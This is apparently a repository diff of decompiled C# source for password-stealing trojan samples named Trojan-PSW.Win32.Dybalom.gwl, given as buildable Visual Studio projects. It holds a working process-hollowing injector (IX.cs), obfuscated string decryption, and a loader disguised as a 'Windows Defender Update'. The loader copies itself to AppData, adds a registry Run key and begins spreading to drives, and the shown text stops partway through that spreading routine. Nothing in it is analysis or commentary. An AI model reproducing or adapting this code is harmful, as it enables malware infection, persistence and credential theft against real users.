<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "htngj_hk", "Trojan-PSW.Win32.Dybalom.gwl-04bddf9aaebe7f8e5f190c73ce44f645c7449c8c5cdb6526b571391ce97f6b06.csproj", "{EECA1923-B24D-41DF-9711-024C45F2B59D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EECA1923-B24D-41DF-9711-024C45F2B59D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: 46-dcrio, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C9E84790-40DE-4FD0-B1D8-6D752394B661
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BAF1FDD5-92B6-4629-8E69-C75120560E7D}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>46-dcrio</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "46-dcrio", "Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.csproj", "{BAF1FDD5-92B6-4629-8E69-C75120560E7D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/AssemblyInfo.cs
+6
View File
@@ -0,0 +1,6 @@
using System.Reflection;
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyDescription("Windows Defender Update")]
[assembly: AssemblyCopyright("Microsoft Corporation")]
[assembly: AssemblyVersion("1.3.2.4")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/FHQnUxOuBUcRwss.cs
+77
View File
@@ -0,0 +1,77 @@
// Decompiled with JetBrains decompiler
// Type: FHQnUxOuBUcRwss
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Text;
public class FHQnUxOuBUcRwss
{
private string rqHLNFetlWEGbEI;
public string TzTZhWCLMKPmtBe
{
get => this.rqHLNFetlWEGbEI;
set => this.rqHLNFetlWEGbEI = value;
}
public FHQnUxOuBUcRwss(string TzTZhWCLMKPmtBe)
{
this.rqHLNFetlWEGbEI = "";
this.TzTZhWCLMKPmtBe = TzTZhWCLMKPmtBe;
}
public FHQnUxOuBUcRwss()
{
this.rqHLNFetlWEGbEI = "";
this.TzTZhWCLMKPmtBe = "";
}
public string DbqjTCEYBFTdyMy(string CNHZIfPZfbnETac) => Encoding.Default.GetString(this.DbqjTCEYBFTdyMy(Encoding.Default.GetBytes(CNHZIfPZfbnETac)));
public byte[] DbqjTCEYBFTdyMy(byte[] CNHZIfPZfbnETac)
{
CNHZIfPZfbnETac = this.cyXPLXnDYMVsnRT(CNHZIfPZfbnETac, Encoding.Default.GetBytes(this.TzTZhWCLMKPmtBe));
byte[] numArray = new byte[CNHZIfPZfbnETac.Length - Convert.ToInt32(Conversions.ToString(10), 2) + 1];
object Counter;
object LoopForResult;
object CounterResult;
if (ObjectFlowControl.ForLoopControl.ForLoopInitObj(Counter, (object) (CNHZIfPZfbnETac.Length - Convert.ToInt32(Conversions.ToString(1), 2)), (object) Convert.ToInt32(Conversions.ToString(1), 2), (object) -Convert.ToInt32(Conversions.ToString(1), 2), ref LoopForResult, ref CounterResult))
{
do
{
numArray[Conversions.ToInteger(Operators.SubtractObject(CounterResult, (object) Convert.ToInt32(Conversions.ToString(1), 2)))] = this.YyVUvduhlLlwqJG(CNHZIfPZfbnETac[Conversions.ToInteger(CounterResult)], (short) -CNHZIfPZfbnETac[Conversions.ToInteger(Operators.SubtractObject(CounterResult, (object) Convert.ToInt32(Conversions.ToString(1), 2)))]);
}
while (ObjectFlowControl.ForLoopControl.ForNextCheckObj(CounterResult, LoopForResult, ref CounterResult));
}
return numArray;
}
private byte YyVUvduhlLlwqJG(byte DKRhIIXNQIgKomU, short JdULYiSRFFfoBdw)
{
while ((int) JdULYiSRFFfoBdw < Convert.ToInt32(Conversions.ToString(0), 2))
JdULYiSRFFfoBdw += (short) Convert.ToInt32(Conversions.ToString(100000000), 2);
return Convert.ToByte((int) (short) ((int) DKRhIIXNQIgKomU + (int) JdULYiSRFFfoBdw) % Convert.ToInt32(Conversions.ToString(100000000), 2));
}
private byte[] cyXPLXnDYMVsnRT(byte[] DKRhIIXNQIgKomU, byte[] lJEhjQWpxnTOONS)
{
object Counter;
object LoopForResult;
object CounterResult;
if (lJEhjQWpxnTOONS.Length != 0 && ObjectFlowControl.ForLoopControl.ForLoopInitObj(Counter, (object) Convert.ToInt32(Conversions.ToString(0), 2), (object) (DKRhIIXNQIgKomU.Length - Convert.ToInt32(Conversions.ToString(1), 2)), (object) 1, ref LoopForResult, ref CounterResult))
{
do
{
DKRhIIXNQIgKomU[Conversions.ToInteger(CounterResult)] = (byte) ((int) DKRhIIXNQIgKomU[Conversions.ToInteger(CounterResult)] ^ (int) this.YyVUvduhlLlwqJG(lJEhjQWpxnTOONS[Conversions.ToInteger(Operators.ModObject(CounterResult, (object) lJEhjQWpxnTOONS.Length))], (short) lJEhjQWpxnTOONS[(int) lJEhjQWpxnTOONS[Conversions.ToInteger(Operators.ModObject(CounterResult, (object) lJEhjQWpxnTOONS.Length))] % lJEhjQWpxnTOONS.Length]) ^ (int) lJEhjQWpxnTOONS[Conversions.ToInteger(Operators.ModObject(Operators.ModObject(Operators.AddObject(CounterResult, Operators.ModObject(CounterResult, (object) Convert.ToInt32(Conversions.ToString(111), 2))), (object) lJEhjQWpxnTOONS.Length), (object) lJEhjQWpxnTOONS.Length))]);
}
while (ObjectFlowControl.ForLoopControl.ForNextCheckObj(CounterResult, LoopForResult, ref CounterResult));
}
return DKRhIIXNQIgKomU;
}
public string cyXPLXnDYMVsnRT(string WSBPooPYkNgMjCb, string lJEhjQWpxnTOONS) => Encoding.Default.GetString(this.cyXPLXnDYMVsnRT(Encoding.Default.GetBytes(WSBPooPYkNgMjCb), Encoding.Default.GetBytes(lJEhjQWpxnTOONS)));
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/Ghost.cs
+42
View File
@@ -0,0 +1,42 @@
// Decompiled with JetBrains decompiler
// Type: Ghost
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
internal class Ghost
{
private int Current;
public string[] StringExclusion;
public string[] NameExclusion;
public int Numbers;
public long Equations;
public Ghost()
{
this.StringExclusion = new string[0];
this.NameExclusion = new string[0];
}
private void Store(string data)
{
if (data.Length != 0)
;
}
public void Process() => this.Current = 0;
private void ProcessStrings()
{
}
private void ProcessNames()
{
}
private void ProcessNumbers() => this.Equations += 6L;
private void ProcessNumber(int value, string result)
{
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/H.resx
+220
View File
File diff suppressed because one or more lines are too long
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/My/MyApplication.cs
+23
View File
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyApplication : ApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/My/MyProject.cs
+113
View File
@@ -0,0 +1,113 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[HideModuleName]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/Trojan-PSW.Win32.Dybalom.gwl.csproj
+49
View File
@@ -0,0 +1,49 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{30C9438B-F02F-487B-9233-C4D46FE57FAC}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>windefender_upd-2</AssemblyName>
<ApplicationVersion>1.3.2.4</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Ghost.cs" />
<Compile Include="FHQnUxOuBUcRwss.cs" />
<Compile Include="YUGFYLIGvlfiyl.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="H.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "windefender_upd-2", "Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.csproj", "{30C9438B-F02F-487B-9233-C4D46FE57FAC}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Debug|Any CPU.Build.0 = Debug|Any CPU
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Release|Any CPU.ActiveCfg = Release|Any CPU
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/YUGFYLIGvlfiyl.cs
+550
View File
@@ -0,0 +1,550 @@
// Decompiled with JetBrains decompiler
// Type: YUGFYLIGvlfiyl
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Resources;
using System.Threading;
using System.Windows.Forms;
public class YUGFYLIGvlfiyl
{
private static string urPkJBxJaoKxHfa;
private static string DFlGLTJoxxwCYfm;
private static string RedtwzrQfYIqsNp;
private static string uIFnBaaCKWySxWn;
[DebuggerNonUserCode]
public YUGFYLIGvlfiyl()
{
}
public static string HqBHDPguDENkfJL(string JEhjQWpxnTOONSD, string KRhIIXNQIgKomUJ)
{
char[] charArray1 = JEhjQWpxnTOONSD.ToCharArray();
char[] charArray2 = KRhIIXNQIgKomUJ.ToCharArray();
char[] chArray = new char[JEhjQWpxnTOONSD.Length - 2 + 1];
int num1 = (int) charArray1[JEhjQWpxnTOONSD.Length - 1];
charArray1[JEhjQWpxnTOONSD.Length - 1] = char.MinValue;
int index1 = 0;
int num2 = JEhjQWpxnTOONSD.Length - 1;
for (int index2 = 0; index2 <= num2; ++index2)
{
if (index2 < JEhjQWpxnTOONSD.Length - 1)
{
if (index1 >= charArray2.Length)
index1 = 0;
int num3 = (int) charArray1[index2];
int num4 = (int) charArray2[index1];
int num5 = num3 - num1 - num4;
chArray[index2] = Convert.ToChar(num5);
++index1;
}
}
return new string(chArray);
}
public static void CiMbIOhpfLGHFKu()
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + Path.GetFileName(Application.ExecutablePath);
while (true)
{
try
{
if (!System.IO.File.Exists(str))
{
System.IO.File.Copy(Application.ExecutablePath, str);
YUGFYLIGvlfiyl.gjbzPIrZcwZdrCX(Path.GetFileName(Application.ExecutablePath), str);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
Thread.Sleep(5000);
}
}
public static void gjbzPIrZcwZdrCX(string Name, string Path) => Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW"), true).SetValue(Name, (object) Path, RegistryValueKind.String);
public static object Spread(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_2:
int num3 = 2;
string location = Assembly.GetExecutingAssembly().Location;
label_3:
num3 = 3;
System.IO.File.Copy(location, drive + "\\erPCyQY.exe");
label_4:
num3 = 4;
FileInfo fileInfo = new FileInfo(drive + "\\erPCyQY.exe");
label_5:
num3 = 5;
